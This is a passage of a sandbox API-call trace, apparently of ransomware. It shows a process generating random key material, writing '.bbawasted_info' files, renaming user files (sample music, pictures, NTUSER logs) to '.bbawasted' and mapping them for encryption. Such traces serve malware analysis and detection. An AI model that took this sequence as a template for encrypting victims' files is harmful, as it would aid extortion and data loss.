pbBuffer=0x119ff08) returned 1 [0077.833] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0077.833] lstrlenW (lpString="\\\\?\\C:\\Users\\Default\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms") returned 113 [0077.834] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0x2ec) returned 0x5ba860 [0077.834] lstrcpyW (in: lpString1=0x5ba942, lpString2=".bbawasted_info" | out: lpString1=".bbawasted_info") returned=".bbawasted_info" [0077.834] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0xa3a) returned 0x5c6ff0 [0077.834] CryptAcquireContextW (in: phProv=0x119fea8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x119fea8*=0x5a4020) returned 1 [0077.834] CryptGenRandom (in: hProv=0x5a4020, dwLen=0xa3a, pbBuffer=0x5c6ff0 | out: pbBuffer=0x5c6ff0) returned 1 [0077.834] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0077.834] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms.bbawasted_info" (normalized: "c:\\users\\default\\ntuser.dat{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.tmcontainer00000000000000000002.regtrans-ms.bbawasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0077.835] WriteFile (in: hFile=0x120, lpBuffer=0x5c6ff0*, nNumberOfBytesToWrite=0xa3a, lpNumberOfBytesWritten=0x119fec4, lpOverlapped=0x0 | out: lpBuffer=0x5c6ff0*, lpNumberOfBytesWritten=0x119fec4*=0xa3a, lpOverlapped=0x0) returned 1 [0077.836] SetEndOfFile (hFile=0x120) returned 1 [0077.836] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0077.836] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5c6ff0 | out: hHeap=0x580000) returned 1 [0077.836] lstrcpyW (in: lpString1=0x5ba942, lpString2=".bbawasted" | out: lpString1=".bbawasted") returned=".bbawasted" [0077.836] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\Default\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms" (normalized: "c:\\users\\default\\ntuser.dat{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.tmcontainer00000000000000000002.regtrans-ms"), lpNewFileName="\\\\?\\C:\\Users\\Default\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms.bbawasted" (normalized: "c:\\users\\default\\ntuser.dat{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.tmcontainer00000000000000000002.regtrans-ms.bbawasted")) returned 1 [0077.837] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms.bbawasted" (normalized: "c:\\users\\default\\ntuser.dat{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.tmcontainer00000000000000000002.regtrans-ms.bbawasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xfc [0077.837] CreateFileMappingW (hFile=0xfc, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x110 [0077.944] CryptAcquireContextW (in: phProv=0x119fe84, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x119fe84*=0x5a4020) returned 1 [0077.944] CryptGenRandom (in: hProv=0x5a4020, dwLen=0x1b8, pbBuffer=0x5baba0 | out: pbBuffer=0x5baba0) returned 1 [0077.944] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0077.944] CryptAcquireContextW (in: phProv=0x119fbec, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x119fbec*=0x5a4020) returned 1 [0077.945] CryptGenRandom (in: hProv=0x5a4020, dwLen=0x200, pbBuffer=0x119fc08 | out: pbBuffer=0x119fc08) returned 1 [0077.945] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0077.953] SetEndOfFile (hFile=0x120) returned 1 [0077.976] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5c6ff0 | out: hHeap=0x580000) returned 1 [0077.976] CloseHandle (hObject=0x120) returned 1 [0077.986] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5ba860 | out: hHeap=0x580000) returned 1 [0077.986] CryptAcquireContextW (in: phProv=0x119fecc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x119fecc*=0x5a4020) returned 1 [0077.989] CryptGenRandom (in: hProv=0x5a4020, dwLen=0x48, pbBuffer=0x119ff08 | out: pbBuffer=0x119ff08) returned 1 [0077.989] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0077.989] lstrlenW (lpString="\\\\?\\C:\\Users\\Public\\Music\\Sample Music\\Maid with the Flaxen Hair.mp3") returned 68 [0077.989] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0x292) returned 0x5d2990 [0077.989] lstrcpyW (in: lpString1=0x5d2a18, lpString2=".bbawasted_info" | out: lpString1=".bbawasted_info") returned=".bbawasted_info" [0077.989] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0xa3a) returned 0x5c6ff0 [0077.989] CryptAcquireContextW (in: phProv=0x119fea8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x119fea8*=0x5a4020) returned 1 [0077.990] CryptGenRandom (in: hProv=0x5a4020, dwLen=0xa3a, pbBuffer=0x5c6ff0 | out: pbBuffer=0x5c6ff0) returned 1 [0077.990] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0077.990] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Public\\Music\\Sample Music\\Maid with the Flaxen Hair.mp3.bbawasted_info" (normalized: "c:\\users\\public\\music\\sample music\\maid with the flaxen hair.mp3.bbawasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0077.990] WriteFile (in: hFile=0x120, lpBuffer=0x5c6ff0*, nNumberOfBytesToWrite=0xa3a, lpNumberOfBytesWritten=0x119fec4, lpOverlapped=0x0 | out: lpBuffer=0x5c6ff0*, lpNumberOfBytesWritten=0x119fec4*=0xa3a, lpOverlapped=0x0) returned 1 [0077.991] SetEndOfFile (hFile=0x120) returned 1 [0077.991] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0077.991] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5c6ff0 | out: hHeap=0x580000) returned 1 [0077.991] lstrcpyW (in: lpString1=0x5d2a18, lpString2=".bbawasted" | out: lpString1=".bbawasted") returned=".bbawasted" [0077.991] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\Public\\Music\\Sample Music\\Maid with the Flaxen Hair.mp3" (normalized: "c:\\users\\public\\music\\sample music\\maid with the flaxen hair.mp3"), lpNewFileName="\\\\?\\C:\\Users\\Public\\Music\\Sample Music\\Maid with the Flaxen Hair.mp3.bbawasted" (normalized: "c:\\users\\public\\music\\sample music\\maid with the flaxen hair.mp3.bbawasted")) returned 1 [0077.992] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Public\\Music\\Sample Music\\Maid with the Flaxen Hair.mp3.bbawasted" (normalized: "c:\\users\\public\\music\\sample music\\maid with the flaxen hair.mp3.bbawasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xfc [0077.992] CreateFileMappingW (hFile=0xfc, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0xf8 [0078.346] CryptAcquireContextW (in: phProv=0x119fe84, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x119fe84*=0x5a4020) returned 1 [0078.368] CryptGenRandom (in: hProv=0x5a4020, dwLen=0x1b8, pbBuffer=0x5d2c78 | out: pbBuffer=0x5d2c78) returned 1 [0078.368] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0078.368] CryptAcquireContextW (in: phProv=0x119fbec, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x119fbec*=0x5a4020) returned 1 [0078.369] CryptGenRandom (in: hProv=0x5a4020, dwLen=0x200, pbBuffer=0x119fc08 | out: pbBuffer=0x119fc08) returned 1 [0078.369] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0078.377] SetEndOfFile (hFile=0x120) returned 1 [0078.379] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5c6ff0 | out: hHeap=0x580000) returned 1 [0078.379] CloseHandle (hObject=0x120) returned 1 [0078.382] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5d2990 | out: hHeap=0x580000) returned 1 [0078.382] CryptAcquireContextW (in: phProv=0x119fecc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x119fecc*=0x5a4020) returned 1 [0078.383] CryptGenRandom (in: hProv=0x5a4020, dwLen=0x48, pbBuffer=0x119ff08 | out: pbBuffer=0x119ff08) returned 1 [0078.383] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0078.383] lstrlenW (lpString="\\\\?\\C:\\Users\\Public\\Music\\Sample Music\\Sleep Away.mp3") returned 53 [0078.383] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0x274) returned 0x5d2990 [0078.383] lstrcpyW (in: lpString1=0x5d29fa, lpString2=".bbawasted_info" | out: lpString1=".bbawasted_info") returned=".bbawasted_info" [0078.383] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0xa3a) returned 0x5c6ff0 [0078.383] CryptAcquireContextW (in: phProv=0x119fea8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x119fea8*=0x5a4020) returned 1 [0078.384] CryptGenRandom (in: hProv=0x5a4020, dwLen=0xa3a, pbBuffer=0x5c6ff0 | out: pbBuffer=0x5c6ff0) returned 1 [0078.384] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0078.384] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Public\\Music\\Sample Music\\Sleep Away.mp3.bbawasted_info" (normalized: "c:\\users\\public\\music\\sample music\\sleep away.mp3.bbawasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0078.385] WriteFile (in: hFile=0x120, lpBuffer=0x5c6ff0*, nNumberOfBytesToWrite=0xa3a, lpNumberOfBytesWritten=0x119fec4, lpOverlapped=0x0 | out: lpBuffer=0x5c6ff0*, lpNumberOfBytesWritten=0x119fec4*=0xa3a, lpOverlapped=0x0) returned 1 [0078.385] SetEndOfFile (hFile=0x120) returned 1 [0078.386] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0078.386] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5c6ff0 | out: hHeap=0x580000) returned 1 [0078.386] lstrcpyW (in: lpString1=0x5d29fa, lpString2=".bbawasted" | out: lpString1=".bbawasted") returned=".bbawasted" [0078.386] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\Public\\Music\\Sample Music\\Sleep Away.mp3" (normalized: "c:\\users\\public\\music\\sample music\\sleep away.mp3"), lpNewFileName="\\\\?\\C:\\Users\\Public\\Music\\Sample Music\\Sleep Away.mp3.bbawasted" (normalized: "c:\\users\\public\\music\\sample music\\sleep away.mp3.bbawasted")) returned 1 [0078.386] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Public\\Music\\Sample Music\\Sleep Away.mp3.bbawasted" (normalized: "c:\\users\\public\\music\\sample music\\sleep away.mp3.bbawasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xf8 [0078.387] CreateFileMappingW (hFile=0xf8, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0xfc [0078.964] CryptAcquireContextW (in: phProv=0x119fe84, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x119fe84*=0x5d0908) returned 1 [0078.972] CryptGenRandom (in: hProv=0x5d0908, dwLen=0x1b8, pbBuffer=0x5d0748 | out: pbBuffer=0x5d0748) returned 1 [0078.972] CryptReleaseContext (hProv=0x5d0908, dwFlags=0x0) returned 1 [0078.972] CryptAcquireContextW (in: phProv=0x119fbec, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x119fbec*=0x5d0908) returned 1 [0078.973] CryptGenRandom (in: hProv=0x5d0908, dwLen=0x200, pbBuffer=0x119fc08 | out: pbBuffer=0x119fc08) returned 1 [0078.973] CryptReleaseContext (hProv=0x5d0908, dwFlags=0x0) returned 1 [0078.982] SetEndOfFile (hFile=0x120) returned 1 [0078.984] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5c6ff0 | out: hHeap=0x580000) returned 1 [0078.984] CloseHandle (hObject=0x120) returned 1 [0078.988] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5d2990 | out: hHeap=0x580000) returned 1 [0078.988] CryptAcquireContextW (in: phProv=0x119fecc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x119fecc*=0x5a4020) returned 1 [0078.989] CryptGenRandom (in: hProv=0x5a4020, dwLen=0x48, pbBuffer=0x119ff08 | out: pbBuffer=0x119ff08) returned 1 [0078.989] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0078.989] lstrlenW (lpString="\\\\?\\C:\\Users\\Public\\Pictures\\Sample Pictures\\Desert.jpg") returned 55 [0078.989] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0x278) returned 0x5d0700 [0078.989] lstrcpyW (in: lpString1=0x5d076e, lpString2=".bbawasted_info" | out: lpString1=".bbawasted_info") returned=".bbawasted_info" [0078.989] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0xa3a) returned 0x5c6ff0 [0078.989] CryptAcquireContextW (in: phProv=0x119fea8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x119fea8*=0x5a4020) returned 1 [0078.990] CryptGenRandom (in: hProv=0x5a4020, dwLen=0xa3a, pbBuffer=0x5c6ff0 | out: pbBuffer=0x5c6ff0) returned 1 [0078.990] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0078.990] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Public\\Pictures\\Sample Pictures\\Desert.jpg.bbawasted_info" (normalized: "c:\\users\\public\\pictures\\sample pictures\\desert.jpg.bbawasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0078.991] WriteFile (in: hFile=0x120, lpBuffer=0x5c6ff0*, nNumberOfBytesToWrite=0xa3a, lpNumberOfBytesWritten=0x119fec4, lpOverlapped=0x0 | out: lpBuffer=0x5c6ff0*, lpNumberOfBytesWritten=0x119fec4*=0xa3a, lpOverlapped=0x0) returned 1 [0078.992] SetEndOfFile (hFile=0x120) returned 1 [0078.992] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0078.992] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5c6ff0 | out: hHeap=0x580000) returned 1 [0078.992] lstrcpyW (in: lpString1=0x5d076e, lpString2=".bbawasted" | out: lpString1=".bbawasted") returned=".bbawasted" [0078.992] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\Public\\Pictures\\Sample Pictures\\Desert.jpg" (normalized: "c:\\users\\public\\pictures\\sample pictures\\desert.jpg"), lpNewFileName="\\\\?\\C:\\Users\\Public\\Pictures\\Sample Pictures\\Desert.jpg.bbawasted" (normalized: "c:\\users\\public\\pictures\\sample pictures\\desert.jpg.bbawasted")) returned 1 [0078.993] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Public\\Pictures\\Sample Pictures\\Desert.jpg.bbawasted" (normalized: "c:\\users\\public\\pictures\\sample pictures\\desert.jpg.bbawasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xfc [0078.993] CreateFileMappingW (hFile=0xfc, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x110 [0079.215] CryptAcquireContextW (in: phProv=0x119fe84, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x119fe84*=0x5a4020) returned 1 [0079.216] CryptGenRandom (in: hProv=0x5a4020, dwLen=0x1b8, pbBuffer=0x5d29d8 | out: pbBuffer=0x5d29d8) returned 1 [0079.216] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0079.216] CryptAcquireContextW (in: phProv=0x119fbec, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x119fbec*=0x5a4020) returned 1 [0079.217] CryptGenRandom (in: hProv=0x5a4020, dwLen=0x200, pbBuffer=0x119fc08 | out: pbBuffer=0x119fc08) returned 1 [0079.217] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0079.230] SetEndOfFile (hFile=0x120) returned 1 [0079.232] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5c6ff0 | out: hHeap=0x580000) returned 1 [0079.232] CloseHandle (hObject=0x120) returned 1 [0079.234] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5d0700 | out: hHeap=0x580000) returned 1 [0079.234] CryptAcquireContextW (in: phProv=0x119fecc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x119fecc*=0x5a4020) returned 1 [0079.235] CryptGenRandom (in: hProv=0x5a4020, dwLen=0x48, pbBuffer=0x119ff08 | out: pbBuffer=0x119ff08) returned 1 [0079.235] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0079.235] lstrlenW (lpString="\\\\?\\C:\\Users\\Public\\Pictures\\Sample Pictures\\Jellyfish.jpg") returned 58 [0079.235] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0x27e) returned 0x5afe60 [0079.235] lstrcpyW (in: lpString1=0x5afed4, lpString2=".bbawasted_info" | out: lpString1=".bbawasted_info") returned=".bbawasted_info" [0079.236] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0xa3a) returned 0x5c6ff0 [0079.236] CryptAcquireContextW (in: phProv=0x119fea8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x119fea8*=0x5a4020) returned 1 [0079.237] CryptGenRandom (in: hProv=0x5a4020, dwLen=0xa3a, pbBuffer=0x5c6ff0 | out: pbBuffer=0x5c6ff0) returned 1 [0079.237] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0079.237] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Public\\Pictures\\Sample Pictures\\Jellyfish.jpg.bbawasted_info" (normalized: "c:\\users\\public\\pictures\\sample pictures\\jellyfish.jpg.bbawasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0079.237] WriteFile (in: hFile=0x120, lpBuffer=0x5c6ff0*, nNumberOfBytesToWrite=0xa3a, lpNumberOfBytesWritten=0x119fec4, lpOverlapped=0x0 | out: lpBuffer=0x5c6ff0*, lpNumberOfBytesWritten=0x119fec4*=0xa3a, lpOverlapped=0x0) returned 1 [0079.238] SetEndOfFile (hFile=0x120) returned 1 [0079.239] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0079.239] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5c6ff0 | out: hHeap=0x580000) returned 1 [0079.239] lstrcpyW (in: lpString1=0x5afed4, lpString2=".bbawasted" | out: lpString1=".bbawasted") returned=".bbawasted" [0079.239] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\Public\\Pictures\\Sample Pictures\\Jellyfish.jpg" (normalized: "c:\\users\\public\\pictures\\sample pictures\\jellyfish.jpg"), lpNewFileName="\\\\?\\C:\\Users\\Public\\Pictures\\Sample Pictures\\Jellyfish.jpg.bbawasted" (normalized: "c:\\users\\public\\pictures\\sample pictures\\jellyfish.jpg.bbawasted")) returned 1 [0079.246] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Public\\Pictures\\Sample Pictures\\Jellyfish.jpg.bbawasted" (normalized: "c:\\users\\public\\pictures\\sample pictures\\jellyfish.jpg.bbawasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x110 [0079.246] CreateFileMappingW (hFile=0x110, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0xf8 [0079.355] CryptAcquireContextW (in: phProv=0x119fe84, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x119fe84*=0x5a4020) returned 1 [0079.356] CryptGenRandom (in: hProv=0x5a4020, dwLen=0x1b8, pbBuffer=0x5d29d8 | out: pbBuffer=0x5d29d8) returned 1 [0079.356] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0079.356] CryptAcquireContextW (in: phProv=0x119fbec, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x119fbec*=0x5a4020) returned 1 [0079.357] CryptGenRandom (in: hProv=0x5a4020, dwLen=0x200, pbBuffer=0x119fc08 | out: pbBuffer=0x119fc08) returned 1 [0079.357] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0079.368] SetEndOfFile (hFile=0x120) returned 1 [0079.371] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5c6ff0 | out: hHeap=0x580000) returned 1 [0079.371] CloseHandle (hObject=0x120) returned 1 [0079.373] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5afe60 | out: hHeap=0x580000) returned 1 [0079.373] CryptAcquireContextW (in: phProv=0x119fecc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x119fecc*=0x5a4020) returned 1 [0079.374] CryptGenRandom (in: hProv=0x5a4020, dwLen=0x48, pbBuffer=0x119ff08 | out: pbBuffer=0x119ff08) returned 1 [0079.374] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0079.374] lstrlenW (lpString="\\\\?\\C:\\Users\\Public\\Pictures\\Sample Pictures\\Lighthouse.jpg") returned 59 [0079.374] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0x280) returned 0x5afe60 [0079.374] lstrcpyW (in: lpString1=0x5afed6, lpString2=".bbawasted_info" | out: lpString1=".bbawasted_info") returned=".bbawasted_info" [0079.374] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0xa3a) returned 0x5c6ff0 [0079.374] CryptAcquireContextW (in: phProv=0x119fea8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x119fea8*=0x5a4020) returned 1 [0079.375] CryptGenRandom (in: hProv=0x5a4020, dwLen=0xa3a, pbBuffer=0x5c6ff0 | out: pbBuffer=0x5c6ff0) returned 1 [0079.375] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0079.375] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Public\\Pictures\\Sample Pictures\\Lighthouse.jpg.bbawasted_info" (normalized: "c:\\users\\public\\pictures\\sample pictures\\lighthouse.jpg.bbawasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0079.376] WriteFile (in: hFile=0x120, lpBuffer=0x5c6ff0*, nNumberOfBytesToWrite=0xa3a, lpNumberOfBytesWritten=0x119fec4, lpOverlapped=0x0 | out: lpBuffer=0x5c6ff0*, lpNumberOfBytesWritten=0x119fec4*=0xa3a, lpOverlapped=0x0) returned 1 [0079.377] SetEndOfFile (hFile=0x120) returned 1 [0079.377] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0079.377] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5c6ff0 | out: hHeap=0x580000) returned 1 [0079.377] lstrcpyW (in: lpString1=0x5afed6, lpString2=".bbawasted" | out: lpString1=".bbawasted") returned=".bbawasted" [0079.377] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\Public\\Pictures\\Sample Pictures\\Lighthouse.jpg" (normalized: "c:\\users\\public\\pictures\\sample pictures\\lighthouse.jpg"), lpNewFileName="\\\\?\\C:\\Users\\Public\\Pictures\\Sample Pictures\\Lighthouse.jpg.bbawasted" (normalized: "c:\\users\\public\\pictures\\sample pictures\\lighthouse.jpg.bbawasted")) returned 1 [0079.408] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Public\\Pictures\\Sample Pictures\\Lighthouse.jpg.bbawasted" (normalized: "c:\\users\\public\\pictures\\sample pictures\\lighthouse.jpg.bbawasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x110 [0079.409] CreateFileMappingW (hFile=0x110, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0xf8 [0079.452] CryptAcquireContextW (in: phProv=0x119fe84, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x119fe84*=0x5d0908) returned 1 [0079.452] CryptGenRandom (in: hProv=0x5d0908, dwLen=0x1b8, pbBuffer=0x5d0748 | out: pbBuffer=0x5d0748) returned 1 [0079.453] CryptReleaseContext (hProv=0x5d0908, dwFlags=0x0) returned 1 [0079.453] CryptAcquireContextW (in: phProv=0x119fbec, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x119fbec*=0x5d0908) returned 1 [0079.454] CryptGenRandom (in: hProv=0x5d0908, dwLen=0x200, pbBuffer=0x119fc08 | out: pbBuffer=0x119fc08) returned 1 [0079.454] CryptReleaseContext (hProv=0x5d0908, dwFlags=0x0) returned 1 [0079.462] SetEndOfFile (hFile=0x120) returned 1 [0079.465] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5c6ff0 | out: hHeap=0x580000) returned 1 [0079.465] CloseHandle (hObject=0x120) returned 1 [0079.466] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5afe60 | out: hHeap=0x580000) returned 1 [0079.467] CryptAcquireContextW (in: phProv=0x119fecc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x119fecc*=0x5a4020) returned 1 [0079.468] CryptGenRandom (in: hProv=0x5a4020, dwLen=0x48, pbBuffer=0x119ff08 | out: pbBuffer=0x119ff08) returned 1 [0079.468] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0079.468] lstrlenW 